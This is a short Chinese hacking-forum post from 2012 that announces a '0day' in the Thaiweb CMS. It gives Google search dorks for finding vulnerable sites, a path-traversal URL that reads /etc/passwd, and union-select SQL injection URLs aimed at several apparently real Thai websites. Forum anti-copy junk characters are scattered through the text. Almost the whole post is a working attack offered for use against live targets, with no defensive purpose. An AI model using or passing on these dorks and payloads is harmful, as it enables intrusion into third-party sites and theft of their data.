找回密码
 立即注册
查看: 3058|回复: 0
打印 上一主题 下一主题

Thaiweb远程文件sql注入漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-27 08:38:39 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Google之:
1 i8 z( p+ y. [* U- S' }; X2 q! y- O* `" y5 W6 w# |2 }
intext:powered by Thaiweb+ P6 X' I7 {5 @, Z( c/ q
5 T. ]0 j4 S  K: z
inurl:index.php?page=board.php
/ M; o, B2 U' u; y! `3 f7 @9 R& Z3 @# }" D, z% M

# [' Q: c6 H& ]: {5 ?" a
; p/ Z* o. G$ B* w) V3 L4 M利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd
6 s# _: J# ~* K1 @6 b: C( K! e  l* \$ S- N+ w% V8 C9 P. E5 t

7 M- `8 J5 h! N7 I: D# s+ h
& N* Z6 g9 Z" z! g利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4'7 [3 b, M; {: G6 x  m* i' A
4 g) B: T) v8 U# \: L( A
# t( y% m* l" _5 J0 a/ q) M9 ~
: f2 ^* F  @# X- @
http://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
" D# I5 O3 m1 z# d* C9 b! w: t# n7 w
http://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
9 W" K1 l% Y' d ; m; R! F) J; _( Q- g8 y& L2 @
http://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--( Q1 E. `, c" u. U
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表